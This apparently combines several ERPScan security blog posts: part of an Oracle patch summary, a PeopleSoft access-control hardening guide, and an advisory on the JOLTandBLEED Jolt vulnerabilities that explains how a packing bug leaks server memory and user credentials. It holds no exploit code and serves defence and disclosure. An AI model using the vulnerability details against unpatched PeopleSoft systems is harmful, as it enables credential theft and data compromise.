• Oracle Peoplesoft Anonymous RCE using PPMI (CVSS base score 9.8, CVE-2017-10366). With malicious JAVA serialized package attackers can execute system command on the remote server.

Securing Oracle applications

It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security assessment and Oracle Penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post Analyzing Oracle Security – Oracle Critical Patch Update October 2017 appeared first on ERPScan.

PeopleSoft has multiple functional opportunities, which are implemented through programs, transactions, and reports. An access to these objects should be strictly regulated by defining user profiles, roles and permission lists as the access to critical actions (e.g. access to modify data or to read any tables) enables users to attack PeopleSoft systems in order to steal critical data or escalate their privileges.

Segregation of Duties (SoD) is a security method to prevent conflict of interests, i.e. to avoid two or more access rights which – being granted together – may increase the risk of fraudulent actions (e.g. a right to create and approve a Payment Order). SoD helps to segregate incompatible responsibilities, which give an individual a chance to commit fraud.

This category provides only 6 basic checks for this access control scope that covers the most critical access rights and relevant settings. Since SoD is based on business processes of an individual company (i.e. an individual method) and its configuration is the second step after assigning critical duties, we do not give a check for SoD in this issue.

PeopleSoft Administrator Role [EASSEC-PVAG-PS-22]

Description

PeopleSoft Administrator is a powerful role that contains one permission list PSADMIN that gives full access to all menus and pages. Being undefined (unlike other roles), the PeopleSoft Administrator role cannot be viewed, edited, modified or cloned. It is hard-coded into every application. You will not find this role if you search for it in the roles component.

Threat

With the PeopleSoft Administrator role, a user gains full access to all menus, pages, component interfaces, web libraries, PeopleTools and everything that can be secured through roles & permission lists. If the PeopleSoft administrator’s authentication data was compromised, the adversary gets an unlimited access to the sensitive business data and processes.

Solution

The number of users with rights granted by the PeopleSoft Administrator role should be minimized. Roles should be assigned according to the principle of least privileges.

To delete the PeopleSoft Administrator role in a User Profile, go to tabs: Home > PeopleTools > Security > User Profiles > User Profiles and delete this role on Roles page .

Page Security [EASSEC-PVAG-PS-23]

Description

Pages are individual screens that a user sees and interfaces with when using PeopleSoft. They allow users to access data in the database without performing SQL commands. Pages are contained within components, which are ultimately included into a menu name. Security within PeopleSoft is controlled by restricting users’ access to menu items or pages.

PeopleSoft delivers a number of default permission lists, such as ALLPAGES and HCPPALL (for PeopleSoft HCM), that provides the access to all pages.

Threat

Users with default permission lists, such as ALLPAGES and HCPPALL, have access to all pages of PeopleSoft application and can execute a variety of critical actions. If there is an authentication data compromise of a user with these permission lists, an attacker will access the system and his/her actions can seriously damage it. Also, if permission lists and roles are not assigned appropriately, an unauthorized access to data takes place here.

Solution

The user privileges should be specified according to the least-privilege principle. The access to default permission lists, such as ALLPAGES and HCPPALL, should be examined, and it is necessary to restrict access to them. The role and permission lists definition should be performed based on the access requirements of a job or a function (e.g. payroll manager) rather than on the user’s perception of his/her access requirements. It should also be noted that the greatest level of access is provided to the user when more than one permission list provides access to a particular page.

PeopleTools Permissions [EASSEC-PVAG-PS-24]

Description

The PeopleTools Permissions section applies to stand-alone PeopleTools applications. They are not Pure Internet Architecture-based but are considered to be Microsoft Windows programs that were not developed using PeopleSoft Application Designer. They include:

• PeopleSoft Application Designer;
• PeopleSoft Data Mover;
• PeopleSoft Definition Security;
• PeopleSoft Query (Microsoft Windows interface, not the browser interface).

Threat

Users with access to stand-alone PeopleTools applications can execute various critical actions that can seriously damage the system. For example, a malicious user can edit PeopleCode leading to a change in business logic for PeopleSoft applications, modify Definition Security resulting in an unauthorized access to update critical objects or move PeopleSoft database causing the loss of valuable information.

Solution

Review the list of users with access to stand-alone PeopleTools applications and decide which of them really need these rights to perform their tasks. To change access rights in permission lists, go to the following tabs: Home > PeopleTools > Security > Permissions & Roles > Permission Lists on PeopleTools page and clear/select appropriate check box. These access rights are assigned to User Profile via the role.

Process Security [EASSEC-PVAG-PS-25]

Description

Process within PeopleSoft may be a program, a batch job, a report, an interface transfer or any activity that requires performing numerous tasks within the system. Such processes are run and managed by the Process Scheduler within PeopleSoft. The access to run a certain process requires a combination of access to the Run Control page from where the process can be run along with the access to the Process Group to which the process itself is assigned. The access to the Run Control page is controlled in the same way as any other PeopleSoft page (see the check above). A batch process is assigned a process group when created, then that process group is linked to a permission list.

Threat

Users with process groups can execute a variety of critical actions, e.g. run system processes, archive processes or start/stop the Application Server.

Solution

Assign Process Groups appropriately to Permission lists and User Profiles following the need and tasks.

To change the Process Group in permission lists, go to the following tabs: Home > PeopleTools > Security > Permissions & Roles > Permission Lists on Process page. These access rights are assigned to User via Process Profile field in General tab of User Profile.

Query Security [EASSEC-PVAG-PS-26]

Description

PeopleSoft provides the ability to run ad hoc queries to access data (in the form of SQL queries) in addition to the information generated via standard reports. This is carried out via the Query tool. It may be necessary to restrict access not only to the Query tool function, but also to the data records upon which queries are run. Query users should have access just to the information to which they usually access via menu options and pages. This is accomplished by setting up query access groups and linking to query trees and permission lists.

Threat

Users with incorrectly assigned query permissions can get unauthorized access to critical data, as a result, this data can be used for future attacks.

Solution

Assign Access Group Permissions and Query Profile appropriately to Permission lists and User Profiles according to the need and tasks.

To change Access Group Permissions and Query Profile in permission lists, go to the following tabs: Home > PeopleTools > Security > Permissions & Roles > Permission Lists on Query page. These rights are assigned to User Profile via the role.

Application Data Security [EASSEC-PVAG-PS-27]

Description

Application Data Security is addressed with table, row security and field access restriction. It is additional security concept and configuration to be considered in relation to how data security is managed within the PeopleSoft application. This is the concept of security sets and aligned security access types:

• table level (for queries only)
• row level
• field level

Threat

If the Application Data Security is configured incorrectly, unauthorized users will access data for which they do not have rights. For example, a manager will have access to review personal data of employees from other departments, or employee will access data that is intended for managers.

Solution

Assign Application Data permissions in accordance with user functions. Application Data Security is implemented by using Application Designer, then assigned to User Profiles through Permission List in General tab in Primary or Row Security Permission Lists fields. For more detail settings, use the PeopleSoft Security Administration guide.

Further steps

In the PeopleSoft PeopleTools, there are nearly hundred of such critical privileges, with each module (PeopleSoft HCM, FSCM, etc.) including the similar number. As mentioned above, these privileges sometimes overlap each other. It is under control of the SoD matrix. A standard matrix contains more than 200 different SoD patterns, while each company can use their own depending on the functional area. Before the SoD analysis, you should check default authorization values in access rights. These rights are often excessive and cause hundreds of various SoD conflicts.

The post EAS-SEC. Oracle PeopleSoft Security Configuration. Part 8: Access control and SoD conflicts appeared first on ERPScan.

As a matter of urgency, Oracle has released 5 patches addressing severe vulnerabilities identified by the ERPScan team. The most critical of them have the highest CVSS base score of 9.9 and even 10.0 and may be exploited over a network without the need for a valid username and password. The issues affect the Jolt server within Oracle Tuxedo as the main component of numerous Oracle’s products. One of the products that use this component is Oracle PeopleSoft. By exploiting these vulnerabilities, an attacker can gain full access to all data stored in the following ERP systems:

• Oracle PeopleSoft Campus Solutions
• Oracle PeopleSoft Human Capital Management
• Oracle PeopleSoft Financial Management
• Oracle PeopleSoft Supply Chain Management, etc.

Vulnerabilities Description

1. CVE-2017-10272 is a vulnerability of memory disclosure; its exploitation gives an attacker a chance to remotely read the memory of the server.
2. CVE-2017-10267 is a vulneralility of stack overflows.
3. CVE-2017-10278 is a vulneralility of heap overflows.
4. CVE-2017-10266 is a vulnerability that makes it possible for a malicious actor to bruteforce passwords of DomainPWD which is used for the Jolt Protocol authentication.
5. CVE-2017-10269 is a vulnerability affecting the Jolt Protocol; it enables an attacker to compromise the whole PeopleSoft system.

This error is originated with that how Jolt Handler (JSH) processes a command with opcode 0x32. If the package structure is incorrect, a programmer has to provide a Jolt client with a certain Jolt response indicating there is an error in the communication process.

During this message engineering, a programmer, that wrote the code, made a mistake in a function call responsible for packing data to transmit. The confusion was between 2 functions, jtohi and htoji. Consequently, packing of a constant package length that must be 0x40 bytes is actually 0x40000000.

Then a client initiates the transmission of 0x40000000 bytes of data. Manipulating the communication with the client, an attacker can achieve a stable work of a server side and sensitive data leakage. Initiating a mass of connections, the hacker passively collects the internal memory of the Jolt server. It leads to the leakage of credentials when a user is entering them through the web interface of a PeopleSoft system.

On November 16, at the DeepSec conference, the technical details as well as the information on how to close these vulnerabilities were revealed.

For those who are interested in more technical information, ERPScan uploaded a video on YouTube.

The post PeopleSoft JOLTandBLEED Vulnerability appeared first on ERPScan.